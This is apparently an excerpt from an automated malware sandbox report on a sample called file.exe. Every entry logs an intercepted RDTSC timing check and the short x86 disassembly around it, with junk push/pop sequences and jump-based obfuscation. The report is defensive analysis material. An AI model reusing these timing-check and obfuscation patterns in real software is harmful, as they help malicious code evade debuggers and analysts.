          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD037D second address: 4BD0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0383 second address: 4BD0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0389 second address: 4BD038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD038D second address: 4BD03E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 shr ecx, 02h 0x0000000b pushad 0x0000000c mov ebx, ecx 0x0000000e pushfd 0x0000000f jmp 00007FBA8CEE23CAh 0x00000014 adc cx, F028h 0x00000019 jmp 00007FBA8CEE23CBh 0x0000001e popfd 0x0000001f popad 0x00000020 rep movsd 0x00000022 pushad 0x00000023 mov al, 30h 0x00000025 pushad 0x00000026 mov bl, 75h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c mov ecx, edx 0x0000002e jmp 00007FBA8CEE23D4h 0x00000033 and ecx, 03h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD03E3 second address: 4BD03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD03E7 second address: 4BD03ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD03ED second address: 4BD0455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b rep movsb 0x0000000d jmp 00007FBA8CCF3D60h 0x00000012 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000019 jmp 00007FBA8CCF3D60h 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 push esi 0x00000022 mov dl, 88h 0x00000024 pop eax 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 mov ecx, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007FBA8CCF3D63h 0x00000034 mov ch, 77h 0x00000036 popad 0x00000037 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0455 second address: 4BD047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr fs:[00000000h], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA8CEE23D1h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD047D second address: 4BD0492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0492 second address: 4BD0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0498 second address: 4BD049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD049C second address: 4BD050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 pushfd 0x00000011 jmp 00007FBA8CEE23D1h 0x00000016 or esi, 626931E6h 0x0000001c jmp 00007FBA8CEE23D1h 0x00000021 popfd 0x00000022 popad 0x00000023 pop edi 0x00000024 jmp 00007FBA8CEE23CEh 0x00000029 pop esi 0x0000002a pushad 0x0000002b mov di, si 0x0000002e mov ah, 1Dh 0x00000030 popad 0x00000031 pop ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FBA8CEE23D0h 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB019F second address: 4BB01A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB01A5 second address: 4BB01FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CEE23CCh 0x00000009 sbb cx, 8228h 0x0000000e jmp 00007FBA8CEE23CBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FBA8CEE23D8h 0x0000001a xor si, 3488h 0x0000001f jmp 00007FBA8CEE23CBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov eax, dword ptr [74E80140h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB01FE second address: 4BB0204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0204 second address: 4BB02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CEE23D8h 0x00000009 add esi, 52088A18h 0x0000000f jmp 00007FBA8CEE23CBh 0x00000014 popfd 0x00000015 mov ecx, 4FE6DDCFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xor eax, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FBA8CEE23D1h 0x00000026 xor esi, 20228BB6h 0x0000002c jmp 00007FBA8CEE23D1h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007FBA8CEE23D0h 0x00000038 sbb cx, 0ED8h 0x0000003d jmp 00007FBA8CEE23CBh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [esp+28h], eax 0x00000048 jmp 00007FBA8CEE23D6h 0x0000004d xchg eax, ebx 0x0000004e jmp 00007FBA8CEE23D0h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 mov dx, si 0x0000005a mov cx, 865Fh 0x0000005e popad 0x0000005f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB02C1 second address: 4BB02C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB02C7 second address: 4BB02CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB02CB second address: 4BB0355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FBA8CCF3D66h 0x00000011 mov ebx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 jmp 00007FBA8CCF3D5Eh 0x0000001a pushfd 0x0000001b jmp 00007FBA8CCF3D62h 0x00000020 add ah, FFFFFF88h 0x00000023 jmp 00007FBA8CCF3D5Bh 0x00000028 popfd 0x00000029 popad 0x0000002a lea eax, dword ptr [esp+08h] 0x0000002e jmp 00007FBA8CCF3D66h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0355 second address: 4BB035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB035B second address: 4BB0384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA8CCF3D5Eh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0384 second address: 4BB0396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0396 second address: 4BB03FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FBA8CCF3D67h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 jmp 00007FBA8CCF3D64h 0x00000015 push esi 0x00000016 push ebx 0x00000017 pop ecx 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FBA8CCF3D63h 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBA8CCF3D65h 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB03FD second address: 4BB040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB040D second address: 4BB048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 pushfd 0x00000013 jmp 00007FBA8CCF3D61h 0x00000018 adc ecx, 3FC38D96h 0x0000001e jmp 00007FBA8CCF3D61h 0x00000023 popfd 0x00000024 popad 0x00000025 lea esi, dword ptr [esp+14h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FBA8CCF3D63h 0x00000032 or ah, FFFFFFCEh 0x00000035 jmp 00007FBA8CCF3D69h 0x0000003a popfd 0x0000003b mov ah, 48h 0x0000003d popad 0x0000003e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB048B second address: 4BB04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FBA8CEE23D0h 0x0000000f push eax 0x00000010 jmp 00007FBA8CEE23CBh 0x00000015 nop 0x00000016 pushad 0x00000017 mov bx, cx 0x0000001a movzx ecx, bx 0x0000001d popad 0x0000001e mov eax, esi 0x00000020 jmp 00007FBA8CEE23D3h 0x00000025 mov dword ptr [esp+14h], 00000010h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBA8CEE23D0h 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB04F0 second address: 4BB04FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB04FF second address: 4BB0517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23D4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB058E second address: 4BB0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0594 second address: 4BB0598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0598 second address: 4BB059C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB059C second address: 4BB05DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FBAFD12DC36h 0x0000000e jmp 00007FBA8CEE23CFh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 mov ecx, 6E75C4EBh 0x0000001a mov edi, esi 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBA8CEE23D8h 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB05DE second address: 4BB0605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA8CCF3D65h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0605 second address: 4BB0615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23CCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0615 second address: 4BB06C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f movzx esi, di 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBA8CCF3D68h 0x0000001b jmp 00007FBA8CCF3D65h 0x00000020 popfd 0x00000021 call 00007FBA8CCF3D60h 0x00000026 mov edx, eax 0x00000028 pop eax 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c push edi 0x0000002d pushfd 0x0000002e jmp 00007FBA8CCF3D66h 0x00000033 sub cl, FFFFFF88h 0x00000036 jmp 00007FBA8CCF3D5Bh 0x0000003b popfd 0x0000003c pop ecx 0x0000003d popad 0x0000003e mov edx, edi 0x00000040 pushad 0x00000041 push ebx 0x00000042 mov bh, al 0x00000044 pop edi 0x00000045 mov dx, cx 0x00000048 popad 0x00000049 mov ecx, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FBA8CCF3D67h 0x00000052 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB071D second address: 4BB07F0 instructions: 0x00000000 rdtsc 0x00000002 call 00007FBA8CEE23D4h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e mov cx, dx 0x00000011 pushfd 0x00000012 jmp 00007FBA8CEE23D3h 0x00000017 sbb cl, FFFFFFFEh 0x0000001a jmp 00007FBA8CEE23D9h 0x0000001f popfd 0x00000020 popad 0x00000021 lea eax, dword ptr [esp+14h] 0x00000025 jmp 00007FBA8CEE23CEh 0x0000002a cmp esi, eax 0x0000002c pushad 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FBA8CEE23D3h 0x00000034 adc ax, 65BEh 0x00000039 jmp 00007FBA8CEE23D9h 0x0000003e popfd 0x0000003f popad 0x00000040 mov di, si 0x00000043 popad 0x00000044 jne 00007FBAFD12DA85h 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FBA8CEE23D8h 0x00000051 or ah, FFFFFFE8h 0x00000054 jmp 00007FBA8CEE23CBh 0x00000059 popfd 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB07F0 second address: 4BB0832 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, edi 0x0000000a jmp 00007FBA8CCF3D5Eh 0x0000000f mov ecx, dword ptr [esp+34h] 0x00000013 jmp 00007FBA8CCF3D60h 0x00000018 pop edi 0x00000019 pushad 0x0000001a mov dx, cx 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx edi, si 0x00000028 mov esi, 76EB8FF9h 0x0000002d popad 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0832 second address: 4BB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CEE23D2h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0B9E second address: 4BC0BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0BA2 second address: 4BC0BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0BA8 second address: 4BC0BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBA8CCF3D63h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBA8CCF3D65h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0BDE second address: 4BC0BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0BE4 second address: 4BC0BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0586 second address: 4BD058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD058B second address: 4BD0591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0591 second address: 4BD0595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0595 second address: 4BD0599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0BBD second address: 4BE0BCE instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7AB55217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0BCE second address: 4BE0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0BD2 second address: 4BE0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0BD6 second address: 4BE0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0BDC second address: 4BE0C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA8CEE23D7h 0x00000009 or ecx, 3CB1BFCEh 0x0000000f jmp 00007FBA8CEE23D9h 0x00000014 popfd 0x00000015 jmp 00007FBA8CEE23D0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FBA8CEE23D0h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushad 0x00000027 call 00007FBA8CEE23CCh 0x0000002c pop eax 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007FBA8CEE23D1h 0x00000036 xor ecx, 52DE4C16h 0x0000003c jmp 00007FBA8CEE23D1h 0x00000041 popfd 0x00000042 popad 0x00000043 push dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FBA8CEE23CDh 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0C8C second address: 4BE0C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0C92 second address: 4BE0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov cl, bh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FBA8CEE23CCh 0x00000016 or cl, FFFFFF98h 0x00000019 jmp 00007FBA8CEE23CBh 0x0000001e popfd 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0CBE second address: 4BE0CEF instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push C84CDB1Dh 0x0000000c jmp 00007FBA8CCF3D5Bh 0x00000011 add dword ptr [esp], 37B424E5h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FBA8CCF3D5Bh 0x00000020 pop esi 0x00000021 mov cx, bx 0x00000024 popad 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0CEF second address: 4BE0CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0CF5 second address: 4BE0CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0CF9 second address: 4BE0CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0D71 second address: 4BE0D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA8CCF3D5Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0A21 second address: 4BD0A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0A27 second address: 4BD0A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CCF3D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov esi, 07C6B633h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0A48 second address: 4BD0A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushfd 0x00000007 jmp 00007FBA8CEE23D2h 0x0000000c jmp 00007FBA8CEE23D5h 0x00000011 popfd 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815EF9 second address: 815F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F01 second address: 815F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F07 second address: 815F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA8CCF3D66h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F27 second address: 815F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE04E4 second address: 4BE04E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE04E8 second address: 4BE0504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0504 second address: 4BE050A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE050A second address: 4BE052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA8CEE23CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBA8CEE23CCh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE052F second address: 4BE05D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, C7h 0x00000005 movzx eax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FBA8CCF3D62h 0x00000014 add ch, 00000068h 0x00000017 jmp 00007FBA8CCF3D5Bh 0x0000001c popfd 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 pushad 0x00000027 mov edi, 16A8C644h 0x0000002c pushfd 0x0000002d jmp 00007FBA8CCF3D5Dh 0x00000032 adc si, 8786h 0x00000037 jmp 00007FBA8CCF3D61h 0x0000003c popfd 0x0000003d popad 0x0000003e push esi 0x0000003f mov cx, di 0x00000042 pop edx 0x00000043 popad 0x00000044 pop eax 0x00000045 jmp 00007FBA8CCF3D66h 0x0000004a call 00007FBA8CCF3D59h 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FBA8CCF3D67h 0x00000056 rdtsc
